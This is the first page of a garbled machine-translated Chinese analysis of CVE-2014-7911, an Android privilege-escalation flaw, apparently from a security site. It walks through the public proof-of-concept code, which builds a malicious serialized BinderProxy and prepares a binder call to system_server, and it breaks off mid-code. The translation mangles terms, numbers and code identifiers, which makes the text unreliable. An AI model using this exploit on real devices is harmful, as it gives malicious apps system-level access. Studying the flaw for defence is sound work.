cve-2 0 1 4-7 9 1 1 Android mention the right vulnerability analysis-vulnerability warning-the black bar safety net

2015-05-23T00:00:00
ID MYHACK58:62201562784
Type myhack58
Reporter 小荷才露尖尖角
Modified 2015-05-23T00:00:00

Description

CVE-2 0 1 4-7 9 1 1 by Jann Horn discovered a about Android to mention the right vulnerability, the vulnerability allows malicious applications from the normal application permissions to provide the right to the system user executing the command, the vulnerability information with the POC(see 1] for. Vulnerability causes due to the Android system 0x02 vulnerability analysis In Jann Horm given the vulnerability information with the POC in(1], to the system_server incoming is Non-serializable the android. os. BinderProxy object instance, which is a member variable on deserialization type confusion, due to BinderProxy. finalize method contains native code, so native code execution when the member variable is cast to a pointer, note that the member variable is attacker controlled, it means that the attacker can control the pointer so that it points to an attacker controlled address space, and ultimately get in the system_server(uid=1 0 0 0 execute code to the permission. The following mainly with the POC for the vulnerability detailed analysis, due to the author prior to the relevant Java serialization, Android binder inter-process communication and native code are not too familiar with, mainly according to reference for translation, sorting and understanding, inappropriate, please readers sea connotation. The Java layer analysis: First, construct a sequence of malicious objects Create AAdroid. os. BinderProxy object, and put it into the Bundle data in Bundle b = new Bundle(); AAdroid. os. BinderProxy evilProxy = new AAdroid. os. BinderProxy(); b. putSerializable("eatthis", evilProxy); Note AAdroid. os. BinderProxy is serialized, its member variables mOrgue is then used to change program execution flow to the pointer. Then the serializable AAdroid. os. BinderProxy will be in the incoming system_server between the modifications is Non-serializable the Android. os. BinderProxy object public class BinderProxy implements Serializable { private static final long serialVersionUID = 0; //public long mObject = 0x1337beef; //public long mOrgue = 0x1337beef; //Note: here you want to be measured according to the Android version number in settings, in our test of the Android 4.4.4, the BinderProxy of this two Field as private int, so as to ensure the POC to access the address for us set the value of the 0x1337beef private int mObject = 0x1337beef; private int mOrgue = 0x1337beef; } The second step, to prepare the incoming system_server data Mainly through a series of java's reflection mechanism to get android. os. IUserManager. Stub,andrioid. os. IUserManager. Stub. Proxy Class object, the finally obtained cross-process calls system_server in the IBinder interface, mRemote, and call the UserManager. setApplicationRestriction function code--TRANSACTION_setApplicationRestriction, with system_server cross-process Binder communication to prepare. Class clIUserManager = Class. forName("android. os. IUserManager"); Class[] umSubclasses = clIUserManager. getDeclaredClasses(); System. out. println(umSubclasses. length+" inner classes found"); Class clStub = null; for (Class c: umSubclasses) { //it's android. os. IUserManager. Stub System. out. println("inner class: "+c. getCanonicalName()); if (c. getCanonicalName(). equals("android. os. IUserManager. Stub")) { clStub = c; } }

Field fTRANSACTION_setApplicationRestrictions = clStub. getDeclaredField("TRANSACTION_setApplicationRestrictions"); fTRANSACTION_setApplicationRestrictions. setAccessible(true); TRANSACTION_setApplicationRestrictions = fTRANSACTION_setApplicationRestrictions. getInt(null);

UserManager um = (UserManager) ctx. getSystemService(Context. USER_SERVICE); Field fService = UserManager. class. getDeclaredField("mService"); fService. setAccessible(true); Object proxy = fService. get(um);

Class[] stSubclasses = clStub. getDeclaredClasses(); System. out. println(stSubclasses. length+" inner classes found"); clProxy = null;

[1] [2] [3] [4] [5] next